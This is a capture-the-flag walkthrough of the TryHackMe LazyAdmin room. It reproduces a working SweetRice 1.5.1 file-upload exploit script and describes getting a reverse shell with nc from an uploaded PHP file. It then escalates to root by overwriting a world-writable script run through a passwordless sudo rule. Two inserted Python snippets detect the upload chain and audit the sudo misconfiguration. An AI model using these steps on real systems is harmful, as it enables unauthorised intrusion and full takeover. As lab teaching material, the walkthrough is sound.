Lazyadmin

Have some fun! There might be multiple ways to get user access.

https://tryhackme.com/room/lazyadmin

Enumeration

First off, let's start by enumerating the machine.

Start off with nmap -sC -sV -v -oA nmap/machine_name $IP.

-sC will use the default scripts on the discovered services.

-sV will enumerate the versions of the discovered services.

-v gives verbose output.

-oA writes the result in different formats (xml, txt, html).

With that we get the following result.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerne

There are two services running, OpenSSH and Apache, and both tell us that this is a Linux box, specifically Ubuntu.

Upon opening the webpage, we are greeted with the default page Apache serves on a fresh install.

There is not much we can do here, so let's check for hidden directories with gobuster.

gobuster dir -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt -t 50 -o gobuster-root-content

dir selects directory brute-forcing mode, and -u $url is the target URL.

-w is which wordlist to use.

-t # sets how many threads to use. The bigger the number, the more concurrent requests and the faster the discovery; however, there is a chance you get blocked by the webserver if you go too fast.

-o stores the result in a file.

After finishing we get

/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/content (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)

The only interesting directory is /content.

Opening it shows us "Welcome to SweetRice". This is our first clue about what is running on Apache.

There is also a link that will show you a few tips on what to do after installing Sweet Rice CMS.

Reading the tips, you'll notice that tip #2 is quite interesting.

2. Protect your data.

SweetRice save all important file in the inc directory, there are two kinds of format: .txt (link.txt, htaccess.txt, lastest.txt) and .db (if track feature enabled). If you are using apache server, the file .htaccess which in inc directory will work for protect your data, if your server is nginx, you may see Security setting for Nginx. For other web server, you may try it yourself.

This is our second clue on where to look for stored information and credentials.

If we check whether the /inc directory is accessible, it indeed is, and it contains interesting files.

.htaccess.txt doesn't do us any good; however, latest.txt and mysql_backup/ contain valuable information.

latest.txt shows us which version of Sweet Rice is running, so we can look up online whether that version has known vulnerabilities, and the mysql_backup/ directory could hold stored credentials.

Downloading the SQL file and reading it closely (a plain text editor or cat will do), we can see that credentials for Sweet Rice CMS are stored in it.

The user is manager and the password is an MD5 hash which can be easily cracked.

Next is to find where the dashboard is as the website said. Do another gobuster scan on the /content directory.

gobuster dir -u http://$TARGET_IP/content -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o gobuster-content-contents

With this we get

/images (Status: 301)
/js (Status: 301)
/inc (Status: 301)
/as (Status: 301)
/_themes (Status: 301)
/attachment (Status: 301)

In the /as directory we are greeted with a login page for Sweet Rice.

Logging in with the discovered credentials, we land in the dashboard as an admin.

Now let's search for an exploit for version 1.5.1.

Using searchsploit sweetrice we get a bunch of exploits for version 1.5.1. If you don't have searchsploit on your machine, just search "Sweet Rice CMS 1.5.1 exploit" online and you'll find the same results on ExploitDB.

SweetRice 0.5.3 - Remote File Inclusion
SweetRice 0.6.7 - Multiple Vulnerabilities
SweetRice 1.5.1 - Arbitrary File Download
SweetRice 1.5.1 - Arbitrary File Upload
SweetRice 1.5.1 - Backup Disclosure
SweetRice 1.5.1 - Cross-Site Request Forgery
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload

I'll be using the Arbitrary File Upload, but manually without using the script.

I'll paste the whole source code of the Python exploit here, go through what it does, and then show how to exploit the service without using the script.

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload
# Exploit Author: Ashiyane Digital Security Team
# Date: 03-11-2016
# Vendor: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Platform: WebApp - PHP - Mysql

import os
from requests import session

# Clear the terminal before printing the banner
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|  _________                      __ __________.__                  |
| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
| \_____  \\ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
| /        \\     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
|        \/             \/     \/            \/        \/    \/     |
|    > SweetRice 1.5.1 Unrestricted File Upload                     |
|    > Script Cod3r : Ehsan Hosseini                                |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''

print(banner)


# Get Host & User & Pass & filename
host = input("Enter The Target URL(Example : localhost.com) : ")
username = input("Enter Username : ")
password = input("Enter Password : ")
filename = input("Enter FileName (Example:.htaccess,shell.php5,index.html) : ")
file = {'upload[]': open(filename, 'rb')}

# Form fields expected by the SweetRice admin login page
payload = {
    'user':username,
    'passwd':password,
    'rememberMe':''
}


with session() as r:
    # Log in first so the session cookie is valid for the upload request
    login = r.post('http://' + host + '/as/?type=signin', data=payload)
    success = 'Login success'
    if login.status_code == 200:
        print("[+] Sending User&Pass...")
        if login.text.find(success) > 1:
            print("[+] Login Successfully...")
        else:
            print("[-] User or Pass is incorrect...")
            print("Good Bye...")
            exit()
    # Upload through the Media Center; the file is served from /attachment/<filename>
    uploadfile = r.post('http://' + host + '/as/?type=media_center&mode=upload', files=file)
    if uploadfile.status_code == 200:
        print("[+] File Uploaded...")
        print("[+] URL : http://" + host + "/attachment/" + filename)

Let's start from the top.

The script wants us to pass a username, a password and a file to upload (preferably a PHP reverse shell).

Then it creates a session and does a POST request to the login page, logging in with the credentials we passed.

After that it uploads the file through the Media Center tab (which you can find on the left side) and tells you where the file is stored: http://IP/attachment/file.

Instead of using the script, let's do this on our own.

Navigate to the Media Center tab on the left.

Now grab a PHP reverse shell from Pentestmonkey, set your local IP and PORT, and save it with the .php5 extension.

Start nc -lvnp PORT to listen on your desired port.

Now upload your PHP script to the Media Center, navigate to the /attachment directory and execute the script.
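As an added defensive example (my code, not part of the original walkthrough or the exploit above), here is a small Python detector that runs over constructed Apache access-log lines and flags exactly the chain the script performs: a POST to the Media Center upload endpoint followed by a GET of a script under /attachment/ from the same client. The IPs, timestamps and the /content prefix are assumptions for the sample data.

```python
import re

# Constructed Apache combined-format access-log lines (sample data, not from the room).
# Client 10.0.0.5 logs in, uploads via the Media Center and then runs the uploaded file;
# client 10.0.0.9 only fetches an image and never executes anything it uploaded.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Feb/2020:19:05:11 +0000] "POST /content/as/?type=signin HTTP/1.1" 200 1532 "-" "python-requests/2.22"
10.0.0.5 - - [06/Feb/2020:19:05:12 +0000] "POST /content/as/?type=media_center&mode=upload HTTP/1.1" 200 420 "-" "python-requests/2.22"
10.0.0.5 - - [06/Feb/2020:19:05:14 +0000] "GET /content/attachment/shell.php5 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Feb/2020:19:07:02 +0000] "GET /content/attachment/logo.png HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Feb/2020:19:07:05 +0000] "POST /content/as/?type=media_center&mode=upload HTTP/1.1" 200 420 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Extensions a default Apache/mod_php setup will execute (.php5 is what the walkthrough uses).
EXEC_EXT = re.compile(r'\.(php\d?|phtml|phar)(\?|$)', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_chains(log_text):
    """Return (ip, path) for every successful GET of an executable file under
    /attachment/ by a client that earlier POSTed to the SweetRice upload endpoint."""
    uploaders = set()
    hits = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if not ev or ev["status"] != "200":
            continue
        path = ev["path"]
        if ev["method"] == "POST" and "/as/" in path and "mode=upload" in path:
            uploaders.add(ev["ip"])
        elif ev["method"] == "GET" and "/attachment/" in path and EXEC_EXT.search(path):
            if ev["ip"] in uploaders:
                hits.append((ev["ip"], path))
    return hits


if __name__ == "__main__":
    for ip, path in find_upload_chains(SAMPLE_LOG):
        print(f"[ALERT] {ip} uploaded and then executed {path}")
```

The same rule, fed from the real access log, is a cheap alert for this CMS; the lasting fix is to keep executable extensions out of the upload directory (or disable PHP handling for /attachment/ in Apache).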

Privilege Escalation

Once you're in, always stabilize your shell.

  1.  python -c 'import pty;pty.spawn("/bin/bash")' # Use Python to spawn a bash shell
  2.  export TERM=xterm # This will allow you to clear your console
  3.  Press CTRL+Z to background the shell
  4.  stty raw -echo;fg # This will allow you to use TAB completion and the arrow keys and return you to your shell.

After you've done that you can get the user flag in its default place :)

After that, listing the user's home directory, we see two interesting files:

backup.pl and mysql_login.txt

Now I haven't done much exploring with MySQL on the machine and haven't found anything. Maybe you can search around and find something.

Looking at what the Perl script does:

#!/usr/bin/perl

system("sh", "/etc/copy.sh");

It simply executes a shell script through Perl's system() call.

Looking at what we can do with that script:

ls -lahs /etc/copy.sh 
4.0K -rw-r--rwx 1 root root 9 Feb  6 19:01 /etc/copy.sh

Everyone can Read, Write and eXecute it (the rwx in the last permission triplet); basically, we can do anything with it.

Let's get a bash shell as root.

Simply overwrite the script with:

echo -n "/bin/bash" > /etc/copy.sh

Now, if we simply execute the backup.pl script it doesn't do anything special; it just spawns another bash shell as the same user. This means there might be another way.

Checking sudo -l, we can see:

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

This means we can execute the Perl script with sudo without a password.

Simply running

sudo /usr/bin/perl /home/itguy/backup.pl

will drop us into a root shell.

With this, you can get the root flag in the root directory :)
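As an added defensive example (my code, not the room's), this Python audit reproduces the check a sysadmin could run against the misconfiguration above: it parses sudo -l output, follows each rule's script into the paths it invokes, and flags any file writable by group or others. The filesystem is a constructed dict modelled on the box (copy.sh's mode 647 comes from the ls output above; its contents are a placeholder).

```python
import re
import stat

# Constructed stand-in for the box. The rule is the one `sudo -l` printed above; the
# modes mirror the ls output (rw-r--rwx = 0o647); copy.sh's body is a placeholder.
SUDO_L_OUTPUT = """\
User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
"""
FAKE_FS = {  # path -> (mode bits, file contents or None for binaries)
    "/usr/bin/perl": (0o755, None),
    "/home/itguy/backup.pl": (0o644, '#!/usr/bin/perl\nsystem("sh", "/etc/copy.sh");\n'),
    "/etc/copy.sh": (0o647, "# placeholder contents\n"),
}

RULE_RE = re.compile(r'^\s*\([^)]*\)\s*(?:NOPASSWD:\s*)?(?P<cmd>/.*)$')
QUOTED_PATH_RE = re.compile(r'"(/[^"\s]+)"')   # absolute paths quoted inside a script body
GROUP_OR_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def sudo_commands(sudo_l_text):
    """Extract the command part of each rule line in `sudo -l` output."""
    rules = (RULE_RE.match(line) for line in sudo_l_text.splitlines())
    return [m.group("cmd").strip() for m in rules if m]


def audit(sudo_l_text, fs):
    """Return (rule, path, mode) for every file reachable from a sudo rule that a
    non-owner could write: the interpreter, the script, and any path the script quotes."""
    findings = []
    for cmd in sudo_commands(sudo_l_text):
        queue = [tok for tok in cmd.split() if tok.startswith("/")]
        seen = set()
        while queue:
            path = queue.pop(0)
            if path in seen or path not in fs:
                continue
            seen.add(path)
            mode, body = fs[path]
            if mode & GROUP_OR_OTHER_WRITE:
                findings.append((cmd, path, oct(mode)))
            if body:  # follow scripts the script itself runs, recursively
                queue.extend(QUOTED_PATH_RE.findall(body))
    return findings


if __name__ == "__main__":
    for cmd, path, mode in audit(SUDO_L_OUTPUT, FAKE_FS):
        print(f"[WARN] rule '{cmd}' reaches {path} with mode {mode}")
```

Against a real host, replace FAKE_FS with os.stat() and open() on the live paths; the fix on this box is chmod 755 (root-owned) on /etc/copy.sh, or dropping the NOPASSWD rule entirely.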

Final Thoughts

This challenge was very easy. I had an easy time exploiting it.

As the challenge says, there might be multiple ways to exploit this, and there are somewhat different ways to get a root shell with the backup.pl and copy.sh scripts.

I haven't really found any other ways.

Hope you enjoyed my way of exploitation :)
